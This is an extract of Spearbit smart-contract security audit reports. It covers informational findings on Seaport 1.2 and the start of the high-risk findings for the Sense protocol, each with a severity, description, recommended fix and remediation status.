Description: Sometimes tokens have extra value because of the derived tokens owned by them (for example an accessory for a player in a game). With the introduction of contract offerer, one can create a contract offerer that automatically lowers the value of a token, for example, by transferring the derived connected token to a different item when Seaport calls the generateOrder(...). When such an order is included in a collection of orders the only way to ensure that the recipient of the item will hold a token which value hasn't depreciated during the transaction is that the recipient would also need to use a kind of mirrored order that incorporates either a CONTRACT or restricted order type that can do a post-transfer check. Recommendation: Document scenarios like the above for the users so that they can interact with Seaport with the above knowledge in mind. Seaport: Acknowledged. Spearbit: Acknowledged. +5.4.42 Restricted order checks in case where offerer and the fulfiller are the same Severity: Informational Context: ZoneInteraction.sol#L61 Description: Seaport 1.2 disallowed skipping restricted order checks when offerrer and fulfiller are the same. • Remove special-casing for offerer-fulfilled restricted orders: Offerers may currently bypass restricted order checks when fulfilling their own orders. This complicates reasoning about restricted order validation, can aid in the deception of other offerers or fulfillers in some unusual edge cases, and serves little practical use. However, in the case of the offerer == fulfiller == zone, the check continues to be skipped. Recommendation: Document this edge case. Seaport: Fixed in PR 854. Spearbit: Verified. +5.4.43 Clean up inline documentation Severity: Informational Context: • ConsiderationEncoder.sol#L216, ConsiderationEncoder.sol#L316, ZoneInteraction.sol#L97-L100, ZoneInteraction.sol#L182 • ConsiderationStructs.sol#L167, ZoneInteraction.sol#L78-L83, ZoneInteraction.sol#L45-L49 • TransferHelperErrors.sol#L29, TransferHelperErrors.sol#L40 • Consideration.sol#L39 Description: The comments highlighted in Context need to be removed or updated. • Remove the following: 73 ConsiderationEncoder.sol:216: // @todo Dedupe some of this ConsiderationEncoder.sol:316: // @todo Dedupe some of this ZoneInteraction.sol:97: // bytes memory callData; ZoneInteraction.sol:100: // function(bytes32) internal view errorHandler; ZoneInteraction.sol:182: // let magicValue := shr(224, mload(callData)) • ConsiderationStructs.sol#L167 and ZoneInteraction.sol#L82 contain an outdated comment about the extraData attribute. There is no longer a staticcall being done, and the function isValidOrderIn- cludingExtraData no longer exists. – The NatSpec comment for _assertRestrictedAdvancedOrderValidity mentions: /** * @dev Internal view function to determine whether an order is a restricted * * * * * order and, if so, to ensure that it was either submitted by the offerer or the zone for the order, or that the zone returns the expected magic value upon performing a staticcall to `isValidOrder` or `isValidOrderIncludingExtraData` depending on whether the order fulfillment specifies extra data or criteria resolvers. A few of the facts are not correct anymore: * This function is not a view function anymore and change the storage state either for a zone or a contract offerer. * It is not only for restricted orders but also applies to orders of CONTRACT order type. * It performs actuall calls and not staticcalls anymore. * it calls the isValidOrder endpoint of a zone or the ratifyOrder endpoint of a contract offerer depending on the order type. * If it is dealing with a restricted order, the check is only skipped if the msg.sender is the zone. Seaport is called by the offerer for a restricted order, the call to the zone is still performed. If – Same comments apply to _assertRestrictedBasicOrderValidity excluding the case when order is of CONTRACT order type. • Typos in TransferHelperErrors.sol - * @dev Revert with an error when a call to a ERC721 receiver reverts with + * @dev Revert with an error when a call to an ERC721 receiver reverts with • The @ NatSpec fields have an extra space in Consideration.sol: * @ The extra space can be removed. Recommendation: Clean up comments. Seaport: Fixed in PR 816. Spearbit: Verified. 74 +5.4.44 Consider writing tests for hard coded constants in ConsiderationConstants.sol Severity: Informational Context: ConsiderationConstants.sol, ConduitConstants.sol Description: There are many hard coded constants, most being function selectors, that should be tested against. Recommendation: Consider adding the following foundry test file: ConstantsTest.t.sol FOUNDRY_PROFILE=test forge test --match-contract ConstantsTest // SPDX-License-Identifier: MIT pragma solidity ^0.8.17; import "forge-std/Test.sol"; import "../../contracts/lib/ConsiderationConstants.sol"; import "../../contracts/conduit/lib/ConduitConstants.sol"; import { ConduitInterface } from "../../contracts/interfaces/ConduitInterface.sol"; import { ContractOffererInterface } from "../../contracts/interfaces/ContractOffererInterface.sol"; import { EIP1271Interface } from "../../contracts/interfaces/EIP1271Interface.sol"; import { ZoneInterface } from "../../contracts/interfaces/ZoneInterface.sol"; import { FulfillmentApplicationErrors } from "../../contracts/interfaces/FulfillmentApplicationErrors.sol"; import { AmountDerivationErrors } from "../../contracts/interfaces/AmountDerivationErrors.sol"; import { CriteriaResolutionErrors } from "../../contracts/interfaces/CriteriaResolutionErrors.sol"; import { ZoneInteractionErrors } from "../../contracts/interfaces/ZoneInteractionErrors.sol"; import { SignatureVerificationErrors } from "../../contracts/interfaces/SignatureVerificationErrors.sol"; import { TokenTransferrerErrors } from "../../contracts/interfaces/TokenTransferrerErrors.sol"; 75 import { ReentrancyErrors } from "../../contracts/interfaces/ReentrancyErrors.sol"; import { ConsiderationEventsAndErrors } from "../../contracts/interfaces/ConsiderationEventsAndErrors.sol"; contract ConstantsTest is Test { // ConsiderationConstants.sol // Function selectors /* * function generateOrder( address fulfiller, * SpentItem[] calldata minimumReceived, * SpentItem[] calldata maximumSpent, * * bytes calldata context * ) * Defined in ContractOffererInterface.sol */ function test_generateOrder_selector() public { assertEq(generateOrder_selector, uint32(ContractOffererInterface.generateOrder.selector)); } /* function ratifyOrder( SpentItem[] calldata offer, ReceivedItem[] calldata consideration, bytes calldata context, bytes32[] calldata orderHashes, uint256 contractNonce * * * * * * ) * Defined in ContractOffererInterface.sol */ function test_ratifyOrder_selector() public { assertEq(ratifyOrder_selector, uint32(ContractOffererInterface.ratifyOrder.selector)); } /* function validateOrder( ZoneParameters calldata zoneParameters * * ) * Defined in ZoneInterface.sol */ function test_validateOrder_selector() public { assertEq(validateOrder_selector, uint32(ZoneInterface.validateOrder.selector)); } /* function isValidSignature( bytes32 digest, bytes calldata signature * * * ) * Defined in EIP1271Interface.sol */ function test_isValidSignature_selector() public { assertEq(EIP1271_isValidSignature_selector, ,! bytes32(EIP1271Interface.isValidSignature.selector)); } // Error selectors 76 /* error MissingFulfillmentComponentOnAggregation(uint8 side) * Defined in FulfillmentApplicationErrors.sol */ function test_MissingFulfillmentComponentOnAggregation_error_selector() public { assertEq(MissingFulfillmentComponentOnAggregation_error_selector, ,! uint32(FulfillmentApplicationErrors.MissingFulfillmentComponentOnAggregation.selector)); } /* error OfferAndConsiderationRequiredOnFulfillment() * Defined in FulfillmentApplicationErrors.sol */ function test_OfferAndConsiderationRequiredOnFulfillment_error_selector() public { assertEq(OfferAndConsiderationRequiredOnFulfillment_error_selector, ,! uint32(FulfillmentApplicationErrors.OfferAndConsiderationRequiredOnFulfillment.selector)); } /* error MismatchedFulfillmentOfferAndConsiderationComponents(uint256 fulfillmentIndex) * Defined in FulfillmentApplicationErrors.sol */ function test_MismatchedFulfillmentOfferAndConsiderationComponents_error_selector() public { assertEq(MismatchedFulfillmentOfferAndConsiderationComponents_error_selector, ,! uint32(FulfillmentApplicationErrors.MismatchedFulfillmentOfferAndConsiderationComponents.selector)); } /* error InvalidFulfillmentComponentData() * Defined in FulfillmentApplicationErrors.sol */ function test_InvalidFulfillmentComponentData_error_selector() public { assertEq(InvalidFulfillmentComponentData_error_selector, ,! uint32(FulfillmentApplicationErrors.InvalidFulfillmentComponentData.selector)); } /* error InexactFraction() * Defined in AmountDerivationErrors.sol */ function test_InexactFraction_error_selector() public { assertEq(InexactFraction_error_selector, ,! uint32(AmountDerivationErrors.InexactFraction.selector)); } /* error OrderCriteriaResolverOutOfRange(uint8 side) * Defined in CriteriaResolutionErrors.sol */ function test_OrderCriteriaResolverOutOfRange_error_selector() public { assertEq(OrderCriteriaResolverOutOfRange_error_selector, ,! uint32(CriteriaResolutionErrors.OrderCriteriaResolverOutOfRange.selector)); } /* error UnresolvedOfferCriteria(uint256 orderIndex, uint256 offerIndex) * Defined in CriteriaResolutionErrors.sol */ function test_UnresolvedOfferCriteria_error_selector() public { assertEq(UnresolvedOfferCriteria_error_selector, ,! uint32(CriteriaResolutionErrors.UnresolvedOfferCriteria.selector)); } /* error UnresolvedConsiderationCriteria(uint256 orderIndex, uint256 considerationIndex) * Defined in CriteriaResolutionErrors.sol */ function test_UnresolvedConsiderationCriteria_error_selector() public { 77 assertEq(UnresolvedConsiderationCriteria_error_selector, ,! uint32(CriteriaResolutionErrors.UnresolvedConsiderationCriteria.selector)); } /* error OfferCriteriaResolverOutOfRange() * Defined in CriteriaResolutionErrors.sol */ function test_OfferCriteriaResolverOutOfRange_error_selector() public { assertEq(OfferCriteriaResolverOutOfRange_error_selector, ,! uint32(CriteriaResolutionErrors.OfferCriteriaResolverOutOfRange.selector)); } /* error ConsiderationCriteriaResolverOutOfRange() * Defined in CriteriaResolutionErrors.sol */ function test_ConsiderationCriteriaResolverOutOfRange_error_selector() public { assertEq(ConsiderationCriteriaResolverOutOfRange_error_selector, ,! uint32(CriteriaResolutionErrors.ConsiderationCriteriaResolverOutOfRange.selector)); } /* error CriteriaNotEnabledForItem() * Defined in CriteriaResolutionErrors.sol */ function test_CriteriaNotEnabledForItem_error_selector() public { assertEq(CriteriaNotEnabledForItem_error_selector, ,! uint32(CriteriaResolutionErrors.CriteriaNotEnabledForItem.selector)); } /* error InvalidProof() * Defined in CriteriaResolutionErrors.sol */ function test_InvalidProof_error_selector() public { assertEq(InvalidProof_error_selector, uint32(CriteriaResolutionErrors.InvalidProof.selector)); } /* error InvalidRestrictedOrder(bytes32 orderHash) * Defined in ZoneInteractionErrors.sol */ function test_InvalidRestrictedOrder_error_selector() public { assertEq(InvalidRestrictedOrder_error_selector, ,! uint32(ZoneInteractionErrors.InvalidRestrictedOrder.selector)); } /* error InvalidContractOrder(bytes32 orderHash) * Defined in ZoneInteractionErrors.sol */ function test_InvalidContractOrder_error_selector() public { assertEq(InvalidContractOrder_error_selector, ,! uint32(ZoneInteractionErrors.InvalidContractOrder.selector)); } /* error BadSignatureV(uint8 v) * Defined in SignatureVerificationErrors.sol */ function test_BadSignatureV_error_selector() public { assertEq(BadSignatureV_error_selector, ,! uint32(SignatureVerificationErrors.BadSignatureV.selector)); } /* error InvalidSigner() * Defined in SignatureVerificationErrors.sol */ 78 function test_InvalidSigner_error_selector() public { assertEq(InvalidSigner_error_selector, ,! uint32(SignatureVerificationErrors.InvalidSigner.selector)); } /* error InvalidSignature() * Defined in SignatureVerificationErrors.sol */ function test_InvalidSignature_error_selector() public { assertEq(InvalidSignature_error_selector, ,! uint32(SignatureVerificationErrors.InvalidSignature.selector)); } /* error BadContractSignature() * Defined in SignatureVerificationErrors.sol */ function test_BadContractSignature_error_selector() public { assertEq(BadContractSignature_error_selector, ,! uint32(SignatureVerificationErrors.BadContractSignature.selector)); } /* error InvalidERC721TransferAmount(uint256 amount) * Defined in TokenTransferrerErrors.sol */ function test_InvalidERC721TransferAmount_error_selector() public { assertEq(InvalidERC721TransferAmount_error_selector, ,! uint32(TokenTransferrerErrors.InvalidERC721TransferAmount.selector)); } /* error MissingItemAmount() * Defined in TokenTransferrerErrors.sol */ function test_MissingItemAmount_error_selector() public { assertEq(MissingItemAmount_error_selector, ,! uint32(TokenTransferrerErrors.MissingItemAmount.selector)); } /* error UnusedItemParameters() * Defined in TokenTransferrerErrors.sol */ function test_UnusedItemParameters_error_selector() public { assertEq(UnusedItemParameters_error_selector, ,! uint32(TokenTransferrerErrors.UnusedItemParameters.selector)); } /* error BadReturnValueFromERC20OnTransfer(address token, address from, address to, uint256 amount) * Defined in TokenTransferrerErrors.sol */ function test_BadReturnValueFromERC20OnTransfer_error_selector() public { assertEq(BadReturnValueFromERC20OnTransfer_error_selector, ,! uint32(TokenTransferrerErrors.BadReturnValueFromERC20OnTransfer.selector)); } /* error NoContract(address account) * Defined in TokenTransferrerErrors.sol */ function test_NoContract_error_selector() public { assertEq(NoContract_error_selector, uint32(TokenTransferrerErrors.NoContract.selector)); } /* error Invalid1155BatchTransferEncoding() * Defined in TokenTransferrerErrors.sol 79 */ function test_Invalid1155BatchTransferEncoding_error_selector() public { assertEq(Invalid1155BatchTransferEncoding_error_selector, ,! uint32(TokenTransferrerErrors.Invalid1155BatchTransferEncoding.selector)); } /* error NoReentrantCalls() * Defined in ReentrancyErrors.sol */ function test_NoReentrantCalls_error_selector() public { assertEq(NoReentrantCalls_error_selector, uint32(ReentrancyErrors.NoReentrantCalls.selector)); } /* error OrderAlreadyFilled(bytes32 orderHash) * Defined in ConsiderationEventsAndErrors.sol */ function test_OrderAlreadyFilled_error_selector() public { assertEq(OrderAlreadyFilled_error_selector, ,! uint32(ConsiderationEventsAndErrors.OrderAlreadyFilled.selector)); } /* error InvalidTime(uint256 startTime, uint256 endTime) * Defined in ConsiderationEventsAndErrors.sol */ function test_InvalidTime_error_selector() public { assertEq(InvalidTime_error_selector, uint32(ConsiderationEventsAndErrors.InvalidTime.selector)); } /* error InvalidConduit(bytes32 conduitKey, address conduit) * Defined in ConsiderationEventsAndErrors.sol */ function test_InvalidConduit_error_selector() public { assertEq(InvalidConduit_error_selector, ,! uint32(ConsiderationEventsAndErrors.InvalidConduit.selector)); } /* error MissingOriginalConsiderationItems() * Defined in ConsiderationEventsAndErrors.sol */ function test_MissingOriginalConsiderationItems_error_selector() public { assertEq(MissingOriginalConsiderationItems_error_selector, ,! uint32(ConsiderationEventsAndErrors.MissingOriginalConsiderationItems.selector)); } /* error InvalidCallToConduit(address conduit) * Defined in ConsiderationEventsAndErrors.sol */ function test_InvalidCallToConduit_error_selector() public { assertEq(InvalidCallToConduit_error_selector, uint32(ConsiderationEventsAndErrors.InvalidCallToConduit.selector)); } /* error ConsiderationNotMet(uint256 orderIndex, uint256 considerationIndex, uint256 shortfallAmount) ,! ,! * Defined in ConsiderationEventsAndErrors.sol */ function test_ConsiderationNotMet_error_selector() public { assertEq(ConsiderationNotMet_error_selector, ,! uint32(ConsiderationEventsAndErrors.ConsiderationNotMet.selector)); } /* error InsufficientEtherSupplied() 80 * Defined in ConsiderationEventsAndErrors.sol */ function test_InsufficientEtherSupplied_error_selector() public { assertEq(InsufficientEtherSupplied_error_selector, ,! uint32(ConsiderationEventsAndErrors.InsufficientEtherSupplied.selector)); } /* error EtherTransferGenericFailure(address account, uint256 amount) * Defined in ConsiderationEventsAndErrors.sol */ function test_EtherTransferGenericFailure_error_selector() public { assertEq(EtherTransferGenericFailure_error_selector, ,! uint32(ConsiderationEventsAndErrors.EtherTransferGenericFailure.selector)); } /* error PartialFillsNotEnabledForOrder() * Defined in ConsiderationEventsAndErrors.sol */ function test_PartialFillsNotEnabledForOrder_error_selector() public { assertEq(PartialFillsNotEnabledForOrder_error_selector, ,! uint32(ConsiderationEventsAndErrors.PartialFillsNotEnabledForOrder.selector)); } /* error OrderIsCancelled(bytes32 orderHash) * Defined in ConsiderationEventsAndErrors.sol */ function test_OrderIsCancelled_error_selector() public { assertEq(OrderIsCancelled_error_selector, ,! uint32(ConsiderationEventsAndErrors.OrderIsCancelled.selector)); } /* error OrderPartiallyFilled(bytes32 orderHash) * Defined in ConsiderationEventsAndErrors.sol */ function test_OrderPartiallyFilled_error_selector() public { assertEq(OrderPartiallyFilled_error_selector, ,! uint32(ConsiderationEventsAndErrors.OrderPartiallyFilled.selector)); } /* error InvalidCanceller() * Defined in ConsiderationEventsAndErrors.sol */ function test_InvalidCanceller_error_selector() public { assertEq(InvalidCanceller_error_selector, ,! uint32(ConsiderationEventsAndErrors.InvalidCanceller.selector)); } /* error BadFraction() * Defined in ConsiderationEventsAndErrors.sol */ function test_BadFraction_error_selector() public { assertEq(BadFraction_error_selector, uint32(ConsiderationEventsAndErrors.BadFraction.selector)); } /* error InvalidMsgValue(uint256 value) * Defined in ConsiderationEventsAndErrors.sol */ function test_InvalidMsgValue_error_selector() public { assertEq(InvalidMsgValue_error_selector, ,! uint32(ConsiderationEventsAndErrors.InvalidMsgValue.selector)); } 81 /* error InvalidBasicOrderParameterEncoding() * Defined in ConsiderationEventsAndErrors.sol */ function test_InvalidBasicOrderParameterEncoding_error_selector() public { assertEq(InvalidBasicOrderParameterEncoding_error_selector, ,! uint32(ConsiderationEventsAndErrors.InvalidBasicOrderParameterEncoding.selector)); } /* error NoSpecifiedOrdersAvailable() * Defined in ConsiderationEventsAndErrors.sol */ function test_NoSpecifiedOrdersAvailable_error_selector() public { assertEq(NoSpecifiedOrdersAvailable_error_selector, ,! uint32(ConsiderationEventsAndErrors.NoSpecifiedOrdersAvailable.selector)); } /* error InvalidNativeOfferItem() * Defined in ConsiderationEventsAndErrors.sol */ function test_InvalidNativeOfferItem_error_selector() public { assertEq(InvalidNativeOfferItem_error_selector, ,! uint32(ConsiderationEventsAndErrors.InvalidNativeOfferItem.selector)); } /* error ConsiderationLengthExceedsTotalOriginal() * Defined in ConsiderationEventsAndErrors.sol */ function test_ConsiderationLengthExceedsTotalOriginal_error_selector() public { assertEq(ConsiderationLengthExceedsTotalOriginal_error_selector, ,! uint32(ConsiderationEventsAndErrors.ConsiderationLengthExceedsTotalOriginal.selector)); } /* error Panic(uint256 code) * Built-in Solidity error */ function test_Panic_error_selector() public { assertEq(Panic_error_selector, uint32(bytes4(keccak256("Panic(uint256)")))); } // uint256 constant MaxUint8 = 0xff; function testMaxUint8() public { assertEq(MaxUint8, type(uint8).max); } // uint256 constant MaxUint120 = 0xffffffffffffffffffffffffffffff; function testMaxUint120() public { assertEq(MaxUint120, type(uint120).max); } // ConduitConstants.sol // Error signature /* error ChannelClosed(address channel) * Defined in ConduitInterface.sol */ function test_ChannelClosed_error_signature() public { assertEq(bytes32(ChannelClosed_error_signature), bytes32(ConduitInterface.ChannelClosed.selector)); } ,! } 82 Seaport: Fixed in PR 885. Spearbit: Verified. +5.4.45 Unused / Redundant imports in ZoneInteraction.sol Severity: Informational Context: ZoneInteraction.sol Description: There are multiple unused / redundant imports. Recommendation: Remove the following imports // SPDX-License-Identifier: MIT pragma solidity ^0.8.17; import { ZoneInterface } from "../interfaces/ZoneInterface.sol"; -import { - -} from "../interfaces/ContractOffererInterface.sol"; ContractOffererInterface -import { ItemType, OrderType } from "./ConsiderationEnums.sol"; +import { OrderType } from "./ConsiderationEnums.sol"; import { - - - - AdvancedOrder, OrderParameters, BasicOrderParameters, AdditionalRecipient, ZoneParameters, OfferItem, - - - - } from "./ConsiderationStructs.sol"; ConsiderationItem, SpentItem, ReceivedItem import { ZoneInteractionErrors } from "../interfaces/ZoneInteractionErrors.sol"; import { LowLevelHelpers } from "./LowLevelHelpers.sol"; -import "./ConsiderationConstants.sol"; -import "./ConsiderationErrors.sol"; -import "./PointerLibraries.sol"; import "./ConsiderationEncoder.sol"; Seaport: Fixed in PR 833. Spearbit: Verified. 83 +5.4.46 Orders of CONTRACT order type do not enforce a usage of a specific conduit Severity: Informational Context: • ConsiderationStructs.sol#L149 • ContractOffererInterface.sol#L7-L12 • ContractOffererInterface.sol#L16-L22 • ZoneInteraction.sol#L119-L124 • ConsiderationEncoder.sol#L128 • ConsiderationEncoder.sol#L65 • OrderValidator.sol#L369-L372 Description: None of the endpoints (generateOrder and ratifyOrder) for an order of CONTRACT order type en- force using a specific conduit. A contract offerer can enforce the usage of a specific conduit or just Seaport by setting allowances or approval for specific tokens. If a caller calls into different Seaport endpoints and does not provide the correct conduit key, then the order would revert. Currently, the ContractOffererInterface interface does not have a specific endpoint to discover which conduits the contract offerer would prefer users to use. getMetadata() would be able to return a metadata that encodes the conduit key. For (advanced) orders of not CONTRACT order types, the offerer would sign the order and the conduit key is included in the signed hash. Thus, the conduit is enforced whenever that order gets included in a collection by an actor calling Seaport. Recommendation: The above points would need to be documented/commented for the users and perhaps in ContractOffererInterface we can add an endpoint for discovering conduit keys. Seaport: Fixed in PR 887. Spearbit: Verified. +5.4.47 Calls to Seaport that would fulfill or match a collection of advanced orders can be front-ran to claim any unused offer items Severity: Informational Context: • Consideration.sol#L222 • Consideration.sol#L320 • Consideration.sol#L382 • Consideration.sol#L435 Description: Calls to Seaport that would fulfill or match a collection of advanced orders can be front-ran to claim any unused offer items. These endpoints include: • fulfillAvailableOrders • fulfillAvailableAdvancedOrders • matchOrders • matchAdvancedOrders Anyone can monitor the mempool to find calls to the above endpoints and calculate if there are any unused offer item amounts. If there are unused offer item amounts, the actor can create orders with no offer items, but with consideration items mirroring the unused offer items and populate the fulfillment aggregation data to match the 84 unused offer items with the new mirrored consideration items. It is possible that the call by the actor would be successful under certain conditions. For example, if there are orders of CONTRACT order type involved, the contract offerer might reject this actor (the rejection might also happen by the zones used when validating the order). But in general, this strategy can be implemented by anyone. Recommendation: The above scenario should be documented and perhaps monitored. Seaport: Fixed in PR 886. Spearbit: Verified. +5.4.48 Advance orders of CONTRACT order types can generate orders with more offer items and the extra offer items might not end up being used. Severity: Informational Context: • OrderValidator.sol#L410-L413 Description: When Seaport gets a collection of advanced orders to fulfill or match, if one of the orders has a CON- TRACT order type, Seaport calls the generateOrder(...) endpoint of that order's offerer. generateOrder(...) can provide extra offer items for this order. These extra offer items might have not been known beforehand by the caller. And if the caller would not incorporate the indexes for the extra items in the fulfillment aggregation data, the extra items would end up not being aggregated into any executions. Recommendation: The extra offer items provided by a contract offerer might not end up being used when fulfilling or matching a collection of advanced orders. The caller would need knowledge of these extra items beforehand to incorporate them. If the contract offerer implements previewOrder which would return the same data as generateOrder when a shared input data is provided to them, then the caller can predict the fulfillment aggregation data. This scenario should be documented regardless. Seaport: Acknowledged. Spearbit: Acknowledged. +5.4.49 Typo for the index check comment in _aggregateValidFulfillmentConsiderationItems Severity: Informational Context: • FulfillmentApplier.sol#L566 Description: There is a typo in _aggregateValidFulfillmentConsiderationItems: // Retrieve item index using an offset of the fulfillment pointer. let itemIndex := mload( add(mload(fulfillmentHeadPtr), Fulfillment_itemIndex_offset) ) // Ensure that the order index is not out of range. <---------- the line with typo if iszero(lt(itemIndex, mload(considerationArrPtr))) { throwInvalidFulfillmentComponentData() } The itemIndex above refers to the index in consideration array and not the order. Recommendation: - // Ensure that the order index is not out of range. + // Ensure that the consideration item index is not out of range. 85 Seaport: Fixed in PR 819. Spearbit: Verified. +5.4.50 Document the unused parameters for orders of CONTRACT order type Severity: Informational Context: • ConsiderationDecoder.sol#L569-L574 • OrderFulfiller.sol#L381 Description: If an advance order advancedOrder is of CONTRACT order type, certain parameters are not being used in the code base, specifically: • numerator: only used for skipping certain operations (see AdvancedOrder.numerator and AdvancedOrder.denominator are unchecked for orders of CONTRACT order type) • denominator: -- • signature: -- • parameters.zone: only used when emitting the OrderFulfilled event. • parameters.offer.endAmount: endAmount and startAmount for offer items will be set to the amount sent back by generateOrder for the corresponding item. • parameters.consideration.endAmount: endAmount and startAmount for consideration items will be set to the amount sent back by generateOrder for the corresponding item • parameters.consideration.recipient: the offerer contract returns new recipients when generateOrder gets called • parameters.zoneHash: -- • parameters.salt: -- • parameters.totalOriginalConsiderationItems: -- Recommendation: Document the decision for not including these parameters. Seaport: Acknowledged. Spearbit: Acknowledged. +5.4.51 The check against totalOriginalConsiderationItems is skipped for orders of CONTRACT order type Severity: Informational Context: Assertions.sol#L54-L57 Description: compares dOrder.parameters.consideration.length: The AdvancedOrder.parameters.totalOriginalConsiderationItems inequality following skipped orders for of is CONTRACT order with type which Advance- // Ensure supplied consideration array length is not less than the original. if (suppliedConsiderationItemTotal < originalConsiderationItemTotal) { _revertMissingOriginalConsiderationItems(); } Recommendation: Leave a comment/document that the above inequality is skipped for CONTRACT order types. Seaport: Fixed in commit af89836. Spearbit: Verified. 86 +5.4.52 getOrderStatus returns the default values for orderHash that is derived for orders of CONTRACT order type Severity: Informational Context: • Consideration.sol#L548 Description: Since the _orderStatus[orderHash] does not get set for orders of CONTRACT order type, getOrder- Status would always returns (false, false, 0, 0) for those hashes (unless there is a hash collision with other types of orders) Recommendation: This can scenario can be documented in the NatSpec comments for getOrderStatus or make sure to update _orderStatus[orderHash] for orders of CONTRACT order type. Seaport: Fixed in PR 835. Spearbit: Verified. +5.4.53 validate skips CONTRACT order types but cancel does not Severity: Informational Context: • Consideration.sol#L488 • Consideration.sol#L466 • OrderValidator.sol#L592-L595 Description: When validating orders validate skips any order of CONTRACT order type, but cancel does not skip these order types. When fulfilling or matching orders for CONTRACT order types, _orderStatus does not get checked or populated. But in cancel the isValidated and the isCancelled fields get set. This is basically a no-op for these order types. Recommendation: To be consistent with the validation endpoint, cancel can also skip updating the _orderStatus for orders of the CONTRACT order type. The skipping check might add some gas overhead for when the order is not of this type, but when it is, this will save us some gas. Seaport: Fixed in PR 853. Spearbit: Verified. +5.4.54 The literal 0x1c used as the starting offset of a custom error in a revert statement can be replaced by the named constant Error_selector_offset Severity: Informational Context: • AmountDeriver.sol#L128 • Assertions.sol#L99 • Executor.sol#L255 • FulfillmentApplier.sol#L233 • FulfillmentApplier.sol#L243 • FulfillmentApplier.sol#L486 • FulfillmentApplier.sol#L522 • FulfillmentApplier.sol#L532 87 • FulfillmentApplier.sol#L761 • OrderValidator.sol#L270 • SignatureVerification.sol#L219 • SignatureVerification.sol#L228 • SignatureVerification.sol#L256 • SignatureVerification.sol#L263 • SignatureVerification.sol#L291 • TokenTransferrer.sol#L221 • TokenTransferrer.sol#L263 • TokenTransferrer.sol#L353 • TokenTransferrer.sol#L392 • TokenTransferrer.sol#L495 • TokenTransferrer.sol#L571 • ConsiderationConstants.sol#L410 Description: In the context above, 0x1c is used to signal the start of a custom error block saved in the memory: revert(0x1c, _LENGTH_) For the above literal, we also have a named constant defined in ConsiderationConstants.sol#L410: uint256 constant Error_selector_offset = 0x1c; The named constant Error_selector_offset has been used in most places that a custom error is reverted in an assembly block. Recommendation: The literal 0x1c used as the starting offset of a custom error revert can be replaced by the named constant Error_selector_offset: import { Error_selector_offset } from "./ConsiderationConstants.sol"; ... revert(Error_selector_offset, _LENGTH_) Seaport: Fixed in PR 813. Spearbit: Verified. 88 diff --git a/findings_newupdate/spearbit/Sense-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/Sense-Spearbit-Security-Review.txt new file mode 100644 index 0000000..696ceef --- /dev/null +++ b/findings_newupdate/spearbit/Sense-Spearbit-Security-Review.txt @@ -0,0 +1,72 @@ +3.1.1 The Variable maxscale Is Not Saved Severity: High Risk Context: Divider.sol#L334-382 Situation: In the function _collect() of Divider.sol, the value maxscale is updated in a temporary variable. However, this temporary variable is not written back to its origin. This means the value of maxscale is not kept over time. function _collect(...) internal returns (uint256 collected) { ,! ... Series memory _series = series[adapter][maturity]; ... // If this is larger than the largest scale we've seen for this Series, use it if (cscale > _series.maxscale) { // _series is a local variable _series.maxscale = cscale; lscales[adapter][maturity][usr] = cscale; // If not, use the previously noted max scale value } else { lscales[adapter][maturity][usr] = _series.maxscale; } } // _series is not saved to series[adapter][maturity] Recommendation: Do one of the following: • Replace memory with storage. This way any access to _series translates to sload/sstore. 5 Series storage _series = series[adapter][maturity]; • At the end of function _collect(), add the following to "save" the value of _series.maxscale. This is assuming maxscale is the only part that has to be saved. series[adapter][maturity].maxscale = _series.maxscale; Sense: Addressed in #163. Spearbit: Acknowledged. +3.1.2 Reserves Not Always Updated In onJoinPool() Severity: High Risk Context: Space.sol#L148-223 Recommendation: In the if part, add something like the following before the call to _cacheReserves(): reserves[_targeti] += reqAmountsIn[_targeti]; Sense: Addressed in #1. Spearbit: Acknowledged. +3.1.3 Wrong Amount in sponsorSeries Severity: High Risk Context: Periphery.sol#L66-76 Situation: In function sponsorSeries(), a different amount is used with safe- TransferFrom() than with safeApprove(), if the number of decimals of the stake token != 18. Normally, safeTransferFrom() and safeApprove() should be the same amount. 6 function sponsorSeries(address adapter, uint48 maturity) external returns ,! (address zero, address claim) { ... // Transfer stakeSize from sponsor into this contract uint256 stakeDecimals = ERC20(stake).decimals(); ERC20(stake).safeTransferFrom(msg.sender, address(this), _convertToBase(stakeSize, stakeDecimals)); // amount 1 // Approve divider to withdraw stake assets ERC20(stake).safeApprove(address(divider), stakeSize); // amount 2 ,! } Recommendation: Spearbit recommends double checking which of these two amounts is the right amount and update the code. We also recommend consid- ering adding unit tests with Stake tokens with less than 18 decimals. Sense: Fixed here. We’ve gotten rid of _convertToBase so the amount should just be stakeSize. Spearbit: Acknowledged. +3.1.4 Return value missing in wrapUnderlying() WstETHAdapter Severity: High Risk Context: 1. WstETHAdapter.sol#L136-142 2. CAdapter.sol#L130-154 3. Periphery.sol#L253-272 Situation: The function wrapUnderlying() of WstETHAdapter does not return any value, which means it returns 0. On the contrary, the function wrapUnder- lying() of CAdapter returns the amount of tokens sent: tBal. The CAdapter version returns the amount of tokens sent (tBal), while the WstETHAdapter re- turn 0. The contract Periphery, which calls wrapUnderlying(), expects a return value. It also bases it’s following actions on this return value. 7 contract WstETHAdapter is BaseAdapter { ... function wrapUnderlying(uint256 amount) external override returns (uint256) { ... ERC20(WSTETH).safeTransfer(msg.sender, wstETH); // transfer wstETH to msg.sender // no return value } ,! ,! } contract CAdapter is CropAdapter { ... function wrapUnderlying(uint256 uBal) external override returns (uint256) { ... ERC20(target).safeTransfer(msg.sender, tBal); return tBal; } } contract Periphery is Trust { ... function addLiquidityFromUnderlying(...) ... { ... uint256 tBal = Adapter(adapter).wrapUnderlying(uBal); return _addLiquidity(adapter, maturity, tBal, mode); // tBal being used here } ,! } Recommendation: In the function wrapUnderlying() of WstETHAdapter(), at the end, add the following: return wstETH; Add unit tests for WstETHAdapter to detect these types of errors. Sense: Fixed here. Spearbit: It was not fixed in the above commit. There is still a stack variable declared that will shadow the return variable. Seems it was fixed in a differ- ent commit here, but still no test coverage was added to this issue on the dev branch. Spearbit: Acknowledged. +3.1.5 Send Reward And Stake Once Severity: High Risk 8 Context: Divider.sol#L157-180, Divider.sol#L511-547 Situation: A reward and stake can be sent from settleSeries() or back- fillScale(). However, this should only be done once. Luckily settleSeries() can’t be run twice as this is prevented by _canBeSet- tled(). However, backfillScale() might be called multiple times. This could result in the function trying to send the reward and the stake multiple times. function settleSeries(address adapter, uint48 maturity) external nonReentrant ,! whenNotPaused { ... // prevents calling this function twice require(_canBeSettled(adapter, maturity), Errors.OutOfWindowBoundaries); ... ERC20(target).safeTransferFrom(adapter, msg.sender, 